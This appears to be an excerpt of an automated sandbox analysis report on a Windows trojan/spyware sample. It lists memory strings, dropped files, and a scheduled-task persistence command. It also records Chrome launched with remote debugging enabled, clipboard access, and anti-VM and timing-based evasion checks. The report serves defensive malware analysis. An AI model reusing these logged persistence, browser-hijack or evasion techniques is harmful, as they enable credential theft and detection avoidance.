Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008819825.00004D7C00684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2008193375.00004D7C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008508868.00004D7C0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2052950679.00004D7C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.2044470661.0000181400C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000004.00000003.2004452467.00003EAC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2004434213.00003EAC002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2012509643.0000181400450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039070484.0000181400290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040534850.00001814005E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040676179.0000181400648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038348454.00001814000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.2043191711.0000181400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b--time-ticks-at-unix-epoc
Source: chrome.exe, 00000004.00000002.2042697650.0000181400A50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000004.00000002.2039358644.0000181400318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000004.00000003.2012509643.0000181400450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000004.00000002.2039193463.00001814002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2041427124.00001814007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041464012.00001814007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2041427124.00001814007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041464012.00001814007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2041427124.00001814007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041464012.00001814007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000004.00000002.2039193463.00001814002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2039193463.00001814002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultouch
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0E9E27

System Summary

Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll C11792DFC9F60EE410C105F2E44E32019AA128F6E1714DEFB1812956DAF3113C
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1140
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: ivdotsri ZLIB complexity 0.9947326007656747
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2180
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: chrome.exe, 00000004.00000002.2041038398.000018140070B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2284,i,475624526408043289,8302134231628123447,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: file.exe Static file information: File size 4373504 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of ivdotsri is bigger than: 0x100000 < 0x1b0a00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00608230 LoadLibraryA,GetProcAddress,FreeLibrary,SleepEx,GetLastError, 8_2_00608230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x42c664 should be: 0x42d8c0
Source: file.exe Static PE information: section name: ivdotsri
Source: file.exe Static PE information: section name: cxbxaeve
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Source: file.exe Static PE information: section name: ivdotsri entropy: 7.955785869140862
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14553C4 second address: 14553CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EABFA second address: 15EAC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EAC00 second address: 15EAC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EAD2F second address: 15EAD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EAE9D second address: 15EAEC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9CD8F21B00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F9CD8F21AFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB5FA second address: 15EB5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB768 second address: 15EB770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB770 second address: 15EB776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB8FF second address: 15EB903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB903 second address: 15EB912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9CD8E65986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB912 second address: 15EB918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15DFA57 second address: 15DFA5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1467 second address: 15F1483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1483 second address: 15F14A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F9CD8E65990h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1967 second address: 15F196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F196C second address: 15F198A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9CD8E65986h 0x00000009 jg 00007F9CD8E65986h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jnl 00007F9CD8E65986h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F198A second address: 15F198F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AC4 second address: 15F1AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E6598Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AD3 second address: 15F1AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F9CD8F21AF6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F9CD8F21AF6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AEE second address: 15F1AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AF2 second address: 15F1B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f jne 00007F9CD8F21AF6h 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F02A9 second address: 15F02AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F02AF second address: 15F02B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B61D2 second address: 15B61EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65992h 0x00000007 js 00007F9CD8E65986h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B61EE second address: 15B6207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B7E85 second address: 15B7EA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65995h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B7EA4 second address: 15B7EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B7EA8 second address: 15B7EBC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e ja 00007F9CD8E65986h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90CE second address: 15F90D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90D4 second address: 15F90D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90D8 second address: 15F90DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90DE second address: 15F90E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FB8A0 second address: 15FB8B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FB8B9 second address: 15FB8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FB8BF second address: 15FB8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD16E second address: 15FD1C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8E6598Bh 0x00000008 jmp 00007F9CD8E65993h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov esi, dword ptr [ebp+122D2C6Ch] 0x00000019 push 00000000h 0x0000001b jmp 00007F9CD8E65997h 0x00000020 push 00000000h 0x00000022 xor esi, 4F095922h 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jng 00007F9CD8E65986h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD1C7 second address: 15FD1CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD1CD second address: 15FD1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
